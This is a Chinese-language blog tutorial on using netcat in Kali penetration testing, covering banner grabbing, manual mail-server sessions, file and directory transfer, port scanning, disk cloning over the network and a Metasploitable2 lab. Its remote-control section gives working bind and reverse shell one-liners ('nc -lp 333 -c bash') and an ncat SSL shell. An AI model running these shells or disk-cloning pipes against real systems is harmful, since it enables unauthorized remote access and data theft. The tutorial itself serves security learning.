kali渗透测试之Web渗透-工具-NETCAT

  1. NC—–TELNET/banner
  2. NC—–传输文本信息
  3. 远程电子取证
  4. NC—-传输文件/目录
  5. NC—–流媒体服务
  6. NC—–端口扫描
  7. NC—–远程克隆硬盘
  8. NC—–远程控制

#kali渗透测试之Web渗透-工具-NETCAT

##NETCAT(传输文件/目录、流媒体服务、端口扫描、远程克隆硬盘)
网络工具中的瑞士军刀——小身材、大智慧
侦听模式/传输模式
telnet/获取banner信息
传输文本信息
传输文件目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘

NC—–TELNET/banner

nc -nv 1.1.1.1 10
nc -nv 1.1.1.1 25
nc -nv 1.1.1.1 80
root:~# nc -h //它的基本用法
root:~# nc -v //端口扫描
root:~# mtr 200.106.0.20 //追踪一下路由
root:~# nc -vn //显示详细的终端信息,不会Dns解析
root:~# ping pop3. 163.com
//连接ip邮箱(客户端链接服务器端)
root:~# nc -vn 123.125.50.29 110
USER
USER 12asdfg
USER ZmfuZZhvbmcueXVhbkAxNjMuY29tCg==

root:~# base64
fanghong.yuan@163.com
(按ctrl+d邮箱编码成:ZmfuZZhvbmcueXVhbkAxNjMuY29tCg==)

root:~# ping smtp.163.com

root:~# nc -nv 123.125.20.138 25

220 163.com Anti-spam GT for Coremail System(163com[20141201])

ehlo

500 Errot: bad syntax

ehlo yuanfh

250-mail

250-PIPELINING

250-AUTH LOGIN PLAIN

250-AUTH=LOGIN PLAIN

250-coremail 1uxr2xKj7G0xkI17xGrU710s8FY2U3Uj8Cz8x1UUUUU7Ic2IOY2Urz03NIUCa0xDrUUUUj

250-ARARTTLS

250 8BIMIME

AUTH LOGIN

344 dxNLcm5hbWU6

fanghong.yuan@163.com

535 Error: authentication failed

root:~# nc -nv 123.125.20.138 25

220 163.com Anti-spam GT for Coremail System(163com[20141201])

ehlo

500 Errot: bad syntax

ehlo yuanfh

250-mail

250-PIPELINING

250-AUTH LOGIN PLAIN

250-AUTH=LOGIN PLAIN

250-coremail 1uxr2xKj7G0xkI17xGrU710s8FY2U3Uj8Cz8x1UUUUU7Ic2IOY2Urz03NIUCa0xDrUUUUj

250-ARARTTLS

250 8BIMIME

AUTH LOGIN

344 dxNLcm5hbWU6

<fanghong.yuan@163.com>

535 Error: authentication failed

root:~# nc -nv 10.1.1.11 80

(UNKNOWN) [10.1.1.11] 80 (http) open

head /

<html><head><titile>Metasploitable2 - Linux</title></head><body>

<pre>

warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

</pre>

<ul>

<li><a href="/twiki/">Twiki</a></li>

<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>

<li><a href="/mutillidae/">Mutillidae</a></li>

<li><a href="/dvwa/">DVWA</a></li>

<li><a href="/dav/">wevDAV</a></li>

</ul>

</body>

</html>

NC—–传输文本信息

A: nc -l -p 4444

B: nc -nv 1.1.1.1 4444

远程电子取证信息收集

开启两台系统kalix64和kalix32

kali 32Bit

root@kali:~# nc -l -p 333 //打开端口333

root@kali:~# netstat -pantu | grep 333 //查看端口33是否打开
ifconfig查看地址:10.1.1.12
kali 64Bit

root:~# nc -nv 10.1.1.12 333

(UNKNOWN) [10.1.1.12] 333 (?) open

然后两台电脑实现聊天的功能!

远程电子取证

kali 32Bit

root@kali:~# nnc -l -p 333 //打开端口333

kali 64Bit

root:~# ls -l | nc -nv 10.1.1.12 333

(UNKNOWN) [10.1.1.12] 333 (?) open

root:~# ps aux //查看可疑的进程

kali 32Bit

root@kali:~# nc -l -p 333 > ps.txt 监听333端口有信息重定向到ps.txt文件里

kali 64Bit
root:~# ps aux | nc -nv 10.1.1.12 333 -q 1
(UNKNOWN) [10.1.1.12] 333 (?) open

kali 32Bit
root@kali:~# cat ps.txt //查看ps.txt文件
kali 32Bit
root@kali:~# nc -l -p 333 > lsof.txt

kali 64Bit

root:~# lsof | nc -nv 10.1.1.12 333 -q 1

(UNKNOWN) [10.1.1.12] 333 (?) open

kali 32Bit

root@kali:~# more lsof.txt //这个文件比较多,所以用more查看文件

NC—-传输文件/目录

传输文件

A: nc -lp 333 > 1.mp4 侦听此端口 接受文件

B: nc -nv 1.1.1.1. 333 < 1.mp4 - q 1 发送到A的计算机 只连接一秒

或

A: nc -q -lp 333 < a.mp4 把视频文件放到333侦听端口 发送

B: nc -nv 1.1.1.1 333 > 2.mp4 客户端链接的得到文件

传输目录

A: tar -cvf - music/ | nc -lp 333 - q 1

B: nc -nv 1.1.1.1 333 | tar -xvf -

加密传文件

A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4          文件解密

B:  mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1     文件加密

A:

root:~/Desktop# nc -lp 333 | mcrypt –flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

Enter passphrase: xxxx

B:

root:~/Desktop# mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

Enter the passphrase (maximum of 512 characters)

Please use a combination of upper and lower case letters and numbers.

Enter passhrase: (UNKNOWN) [10.1.1.12] 333 (?) open

en

Enter passphrase: xxxx

NC不自带mcrypt,需要自己安装!

NC—–流媒体服务

A: cat 1.mp4 | nc -lp 333

B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

NC—–端口扫描

nc -nvz 1.1.1.1 -65536

nc -vnzu 1.1.1.1 1-1024

root@1kali:~# nc -h

[v1.10-38]

connect to somewhere: nc [-options] hostname port[s] [ports] …

listen for inbound: nc -l -p port [-options] [hostname] [port]

options:

-c shell commands   as `-e'; use /bin/sh to exec [dangerous!!]

-e filename     program to exec after connect [dangerous!!]

-b          allow broadcasts

-g gateway      source-routing hop point[s], up to 8                          设置路由器跃程通信网关,最高可设置8个。

-G num          source-routing pointer: 4, 8, 12, ...                         设置来源路由指向器,其数值为4的倍数。

-h          this cruft 

-i secs         delay interval for lines sent, ports sca                      延时的间隔

    -k                      set keepalive option on socket

-l          listen mode, for inbound connects                             监听模式,入站连接

-n          numeric-only IP addresses, no DNS                             直接使用ip地址,而不用域名服务器

-o file         hex dump of traffic                                           指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。

-p port         local port number                                             本地端口

-r          randomize local and remote ports                              随机本地和远程端口 

-q secs         quit after EOF on stdin and delay of secs

-s addr         local source address  

-T tos          set Type Of Service

-t          answer TELNET negotiation   

-u          UDP mode                                                      udp  模式

-v          verbose [use twice to be more verbose]                        显示过程,vv 更多

-w secs         timeout for connects and final net reads                      等待连接超时

-z          zero-I/O mode [used for scanning]                             使用输入/输出模式,只在扫描通信端口时使用。

NC—–远程克隆硬盘

 A: nc -lp 333 | dd of=/dev/sda

 B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

远程电子取证,可以讲目标服务器远程复制,或者内存。

NC—–远程控制

正向:

A: nc  -lp 333 -  bash

B: nc  1.1.1.1 333

反向:

A: nc -nv 1.1.1.1 333

B: nc -lp 333 -c bash

注:Windows用户把bash改成cmd;

root@kali:~# ifconfig

eth0 Link encap:Ethernet HWaddr 00:0c:29:c6:89:56

      inet addr:192.168.198.130  Bcast:192.168.198.255  Mask:255.255.255.0

      inet6 addr: fe80::20c:29ff:fec6:8956/64 Scope:Link

      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

      RX packets:46 errors:0 dropped:0 overruns:0 frame:0

      TX packets:49 errors:0 dropped:0 overruns:0 carrier:0

      collisions:0 txqueuelen:1000 

      RX bytes:6770 (6.6 KiB)  TX bytes:8161 (7.9 KiB)

      Interrupt:19 Base address:0x2000 

lo Link encap:Local Loopback

      inet addr:127.0.0.1  Mask:255.0.0.0

      inet6 addr: ::1/128 Scope:Host

      UP LOOPBACK RUNNING  MTU:65536  Metric:1

      RX packets:20 errors:0 dropped:0 overruns:0 frame:0

      TX packets:20 errors:0 dropped:0 overruns:0 carrier:0

      collisions:0 txqueuelen:0 

      RX bytes:1200 (1.1 KiB)  TX bytes:1200 (1.1 KiB)

A:

root@kali:~# nc -nv 192.168.1.115 333 -c bash

(UNKNOWN) [192.168.1.115] 333 (?) open

ls

pwd

没有任何反应

B:

root:~# nc -lp 333

ls

Desktop

/root

ifconfig

……(一串文字)

请求来控制我!

NC—–NCAT

Nc缺乏就加密和身份验证的能力

Ncat包含于nmap工具包中

A: ncat -c bash –allow 192.168.20.14 -vnl 333 –ssl

B: ncat -nv 1.1.1.1 333 –ssl

不同系统/平台的nc参数功能不尽相同

root:~# man nc

root:~# nc -h


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:kali渗透测试之Web渗透-工具-NETCAT

文章字数:1,656

本文作者:Mang0

发布时间:2018-02-27, 19:38:09

最后更新:2018-11-02, 21:52:12

原始链接:http://mang0.me/archis/32be69d6/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏